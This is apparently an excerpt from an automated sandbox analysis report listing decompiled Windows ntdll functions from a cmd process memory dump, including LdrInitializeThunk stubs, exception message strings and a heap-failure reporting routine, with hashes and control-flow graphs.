                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 16 3c19fe0-3c19fec LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 9bd1be1a1ea76fd1b680b4420949b7ab6451eb1afa39b5dfbd1a0b1e87d12f4d
                                                                                                                                          • Instruction ID: 4072a0fca05a0380b7aaa23b3b5c236639b8b57e2dba8d298173b81694010f68
                                                                                                                                          • Opcode Fuzzy Hash: 9bd1be1a1ea76fd1b680b4420949b7ab6451eb1afa39b5dfbd1a0b1e87d12f4d
                                                                                                                                          • Instruction Fuzzy Hash: E79002B131119902D111A1598408706150597E1251F71C411A492C558D87D588917162
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 8 3c19780-3c1978c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6ac97dc62d559924865a82e0a9c587382d7d673d6180236aaf821491ce072a5a
                                                                                                                                          • Instruction ID: a2ee4e39beddad62d0997dee24381a55c04cef7a3b0c6e742847cb73f3fdecce
                                                                                                                                          • Opcode Fuzzy Hash: 6ac97dc62d559924865a82e0a9c587382d7d673d6180236aaf821491ce072a5a
                                                                                                                                          • Instruction Fuzzy Hash: 409002A921305502D181B159540C60A150597E1252FB1D415A411D558CCA5588696361
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C197A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 9 3c197a0-3c197ac LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6f87e2d0818f3cb773c318ae73b5df9f0a26582c6bad75cb29e4603225a96b5e
                                                                                                                                          • Instruction ID: e4fc2ceb034a6db94f205ed01771a153e72a2412a1703861c99cc2dee2398b14
                                                                                                                                          • Opcode Fuzzy Hash: 6f87e2d0818f3cb773c318ae73b5df9f0a26582c6bad75cb29e4603225a96b5e
                                                                                                                                          • Instruction Fuzzy Hash: B79002A130105503D141B159541C6065505E7F1351F71D011E451C554CDA5588566262
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 7 3c19710-3c1971c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 1a5ecddc22a3df00adde340a9f9d1c316d96989dfae0a9bd069e79d2aa723eb1
                                                                                                                                          • Instruction ID: 1a8cd429c918b9d5e9d8f6fd0d61571d37378ea128c86c432519c72c03600b36
                                                                                                                                          • Opcode Fuzzy Hash: 1a5ecddc22a3df00adde340a9f9d1c316d96989dfae0a9bd069e79d2aa723eb1
                                                                                                                                          • Instruction Fuzzy Hash: AF9002B120105902D101A599540C646150597F0351F71D011A912C555EC7A588917171
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C196E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 6 3c196e0-3c196ec LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 7a1a37366cf4890ff5739c00121897e3ace86182d890be0440953b2aa1e80f3a
                                                                                                                                          • Instruction ID: 8063444545727ddc3aa76364ac37c6674d6768efcce642bb4f25663b95504364
                                                                                                                                          • Opcode Fuzzy Hash: 7a1a37366cf4890ff5739c00121897e3ace86182d890be0440953b2aa1e80f3a
                                                                                                                                          • Instruction Fuzzy Hash: 119002B12010DD02D111A159840874A150597E0351F75C411A852C658D87D588917161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C195D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 5 3c195d0-3c195dc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: e6facc499c0fbdb9dbf59b61de5697d28af1ffb247fc9d473d3af68eab7d3c27
                                                                                                                                          • Instruction ID: 6c0e14c22baea1766740be68e09dbf1f70542c6c726b344847d1598a90827d0f
                                                                                                                                          • Opcode Fuzzy Hash: e6facc499c0fbdb9dbf59b61de5697d28af1ffb247fc9d473d3af68eab7d3c27
                                                                                                                                          • Instruction Fuzzy Hash: 0B9002E1202055034106B1594418616550A97F0251B71C021E511C590DC66588917165
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 4 3c19540-3c1954c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6dc75aec3a232327f27c2e4bbc6d14bfa876f2cb080edd6ab726ea1c658f4410
                                                                                                                                          • Instruction ID: 5692638c0c72d89f439ac723276284fcf80840b06f62ad29f8c24f967a73817b
                                                                                                                                          • Opcode Fuzzy Hash: 6dc75aec3a232327f27c2e4bbc6d14bfa876f2cb080edd6ab726ea1c658f4410
                                                                                                                                          • Instruction Fuzzy Hash: 2D9002A5211055030106E5590708507154697E53A1371C021F511D550CD76188616161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 3c1967a-3c1967f 1 3c19681-3c19688 0->1 2 3c1968f-3c19696 LdrInitializeThunk 0->2
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 832a5fa7abc4df15c521a7073d2b775f9d46522b28cbf24d0149c336fff7b1dd
                                                                                                                                          • Instruction ID: 85ef57f1fa857b619d394dde1d1b18a15b1a5c43202930451f14578a19cd3caf
                                                                                                                                          • Opcode Fuzzy Hash: 832a5fa7abc4df15c521a7073d2b775f9d46522b28cbf24d0149c336fff7b1dd
                                                                                                                                          • Instruction Fuzzy Hash: F2B09BB19015D5C5D651D760460C7177E1477D1751F36C051D213C641A4778C1A1F5F5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 03C8B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 17 3c8b260-3c8b277 call 3c2d08c GetPEB 20 3c8b279-3c8b27c 17->20 21 3c8b27e 17->21 22 3c8b283-3c8b291 GetPEB 20->22 21->22 23 3c8b293-3c8b2a1 22->23 24 3c8b2a7-3c8b2b4 22->24 23->24 25 3c8b550-3c8b552 23->25 26 3c8b2ba-3c8b2c0 24->26 27 3c8b48b-3c8b4ab call 3c65720 24->27 28 3c8b555-3c8b55f 25->28 29 3c8b414-3c8b45f call 3c65720 * 3 26->29 30 3c8b2c6-3c8b2cc 26->30 44 3c8b4ad 27->44 45 3c8b4b2-3c8b4ca call 3c65720 27->45 32 3c8b56f-3c8b580 call 3c2d0d1 28->32 33 3c8b561-3c8b56d call 3c60c30 28->33 81 3c8b461-3c8b466 29->81 82 3c8b484-3c8b489 29->82 34 3c8b32d-3c8b335 30->34 35 3c8b2ce-3c8b2d8 30->35 33->32 38 3c8b33b-3c8b345 34->38 39 3c8b40c-3c8b40f 34->39 41 3c8b2da-3c8b2ee call 3c65720 35->41 42 3c8b2f3-3c8b328 call 3c65720 * 3 35->42 47 3c8b396-3c8b3b4 call 3c65720 38->47 48 3c8b347-3c8b34b 38->48 53 3c8b4ef-3c8b508 call 3c65720 39->53 41->53 74 3c8b4e5-3c8b4ec call 3c65720 42->74 44->45 64 3c8b4cc-3c8b4de call 3c65720 45->64 65 3c8b4e0 45->65 70 3c8b3d6 47->70 71 3c8b3b6-3c8b3d4 call 3c65720 * 2 47->71 48->47 57 3c8b34d-3c8b36f call 3c65720 48->57 76 3c8b50a-3c8b519 call 3c65720 53->76 77 3c8b51c-3c8b534 call 3c65720 53->77 85 3c8b37b 57->85 86 3c8b371-3c8b379 57->86 64->53 65->74 84 3c8b3db-3c8b3e2 call 3c65720 70->84 109 3c8b3e5-3c8b3ec 71->109 74->53 76->77 77->28 101 3c8b536-3c8b54e call 3c65720 77->101 92 3c8b468-3c8b46d 81->92 93 3c8b47d-3c8b482 81->93 82->74 84->109 97 3c8b37d-3c8b37e 85->97 98 3c8b38f-3c8b394 85->98 96 3c8b383-3c8b38d call 3c65720 86->96 92->93 103 3c8b46f-3c8b474 92->103 93->74 96->109 97->96 98->84 101->28 103->53 108 3c8b476-3c8b47b 103->108 108->74 109->53
                                                                                                                                          Strings
                                                                                                                                          • <unknown>, xrefs: 03C8B27E, 03C8B2D1, 03C8B350, 03C8B399, 03C8B417, 03C8B48E
                                                                                                                                          • write to, xrefs: 03C8B4A6
                                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03C8B484
                                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03C8B323
                                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03C8B305
                                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03C8B53F
                                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03C8B39B
                                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03C8B38F
                                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 03C8B48F
                                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03C8B314
                                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03C8B47D
                                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 03C8B352
                                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03C8B476
                                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03C8B3D6
                                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 03C8B3C5
                                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03C8B2F3
                                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 03C8B4F1
                                                                                                                                          • read from, xrefs: 03C8B4AD, 03C8B4B2
                                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 03C8B374
                                                                                                                                          • The critical section is owned by thread %p., xrefs: 03C8B3B9
                                                                                                                                          • *** enter .cxr %p for the context, xrefs: 03C8B50D
                                                                                                                                          • a NULL pointer, xrefs: 03C8B4E0
                                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03C8B2DC
                                                                                                                                          • The resource is owned shared by %d threads, xrefs: 03C8B37E
                                                                                                                                          • an invalid address, %p, xrefs: 03C8B4CF
                                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 03C8B432
                                                                                                                                          • The instruction at %p tried to %s , xrefs: 03C8B4B6
                                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 03C8B418
                                                                                                                                          • *** then kb to get the faulting stack, xrefs: 03C8B51C
                                                                                                                                          • This failed because of error %Ix., xrefs: 03C8B446
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                          • API String ID: 0-108210295
                                                                                                                                          • Opcode ID: 1b312546209388bb0461c2efe4d4d533c98881f1c09b442ce3f805ccae9b8e06
                                                                                                                                          • Instruction ID: 9d7f469ee46d7284931ba444702d51454e61bb05c38cb2a134fd79f80ea39ccb
                                                                                                                                          • Opcode Fuzzy Hash: 1b312546209388bb0461c2efe4d4d533c98881f1c09b442ce3f805ccae9b8e06
                                                                                                                                          • Instruction Fuzzy Hash: 0081F279A10250FFCB31EB058C96D6F7B25EF87B59F0540ACF004EF122D6619A51DAB2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C91C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                          			E03C91C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x3bb48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03BDB150();
				} else {
					E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x3cc589c);
				E03BDB150("Heap error detected at %p (heap handle %p)\n",  *0x3cc58a0);
				_t27 =  *0x3cc5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03C91E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03BDB150();
				} else {
					E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E03BDB150("Error code: %d - %s\n",  *0x3cc5898);
				_t113 =  *0x3cc58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03BDB150();
					} else {
						E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03BDB150("Parameter1: %p\n",  *0x3cc58a4);
				}
				_t115 =  *0x3cc58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03BDB150();
					} else {
						E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03BDB150("Parameter2: %p\n",  *0x3cc58a8);
				}
				_t117 =  *0x3cc58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03BDB150();
					} else {
						E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E03BDB150("Parameter3: %p\n",  *0x3cc58ac);
				}
				_t119 =  *0x3cc58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E03BDB150();
					} else {
						E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x3cc58b4);
					E03BDB150("Last known valid blocks: before - %p, after - %p\n",  *0x3cc58b0);
				} else {
					_t120 =  *0x3cc58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03BDB150();
				} else {
					E03BDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E03BDB150("Stack trace available at %p\n", 0x3cc58c0);
			}











                                                                                                                                          0x03c91c10
                                                                                                                                          0x03c91c16
                                                                                                                                          0x03c91c1e
                                                                                                                                          0x03c91c3d
                                                                                                                                          0x03c91c3e
                                                                                                                                          0x03c91c20
                                                                                                                                          0x03c91c35
                                                                                                                                          0x03c91c3a
                                                                                                                                          0x03c91c44
                                                                                                                                          0x03c91c55
                                                                                                                                          0x03c91c5a
                                                                                                                                          0x03c91c65
                                                                                                                                          0x03c91c67
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91c6e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91c67
                                                                                                                                          0x03c91cdc
                                                                                                                                          0x03c91ce5
                                                                                                                                          0x03c91d04
                                                                                                                                          0x03c91d05
                                                                                                                                          0x03c91ce7
                                                                                                                                          0x03c91cfc
                                                                                                                                          0x03c91d01
                                                                                                                                          0x03c91d0b
                                                                                                                                          0x03c91d17
                                                                                                                                          0x03c91d1f
                                                                                                                                          0x03c91d25
                                                                                                                                          0x03c91d30
                                                                                                                                          0x03c91d4f
                                                                                                                                          0x03c91d50
                                                                                                                                          0x03c91d32
                                                                                                                                          0x03c91d47
                                                                                                                                          0x03c91d4c
                                                                                                                                          0x03c91d61
                                                                                                                                          0x03c91d67
                                                                                                                                          0x03c91d68
                                                                                                                                          0x03c91d6e
                                                                                                                                          0x03c91d79
                                                                                                                                          0x03c91d98
                                                                                                                                          0x03c91d99
                                                                                                                                          0x03c91d7b
                                                                                                                                          0x03c91d90
                                                                                                                                          0x03c91d95
                                                                                                                                          0x03c91daa
                                                                                                                                          0x03c91db0
                                                                                                                                          0x03c91db1
                                                                                                                                          0x03c91db7
                                                                                                                                          0x03c91dc2
                                                                                                                                          0x03c91de1
                                                                                                                                          0x03c91de2
                                                                                                                                          0x03c91dc4
                                                                                                                                          0x03c91dd9
                                                                                                                                          0x03c91dde
                                                                                                                                          0x03c91df3
                                                                                                                                          0x03c91df9
                                                                                                                                          0x03c91dfa
                                                                                                                                          0x03c91e00
                                                                                                                                          0x03c91e0a
                                                                                                                                          0x03c91e13
                                                                                                                                          0x03c91e32
                                                                                                                                          0x03c91e33
                                                                                                                                          0x03c91e15
                                                                                                                                          0x03c91e2a
                                                                                                                                          0x03c91e2f
                                                                                                                                          0x03c91e39
                                                                                                                                          0x03c91e4a
                                                                                                                                          0x03c91e02
                                                                                                                                          0x03c91e02
                                                                                                                                          0x03c91e08
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91e08
                                                                                                                                          0x03c91e5b
                                                                                                                                          0x03c91e7a
                                                                                                                                          0x03c91e7b
                                                                                                                                          0x03c91e5d
                                                                                                                                          0x03c91e72
                                                                                                                                          0x03c91e77
                                                                                                                                          0x03c91e95

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                          • API String ID: 0-2897834094
                                                                                                                                          • Opcode ID: 09996e2e518fc9feae71c30b027d66ee9d23c5548112e22653dba189fe20d4dd
                                                                                                                                          • Instruction ID: 83bcb7a3365232fe54d897e3c3d42198038409835dbed4771d0701acf12e0f26
                                                                                                                                          • Opcode Fuzzy Hash: 09996e2e518fc9feae71c30b027d66ee9d23c5548112e22653dba189fe20d4dd
                                                                                                                                          • Instruction Fuzzy Hash: 8B61753B671296DFEA11EB46D44AE3477F4E704A2AB0F40BFF40ADF215D6749C408A19
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                          			E03BE3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03BE1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03BE1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
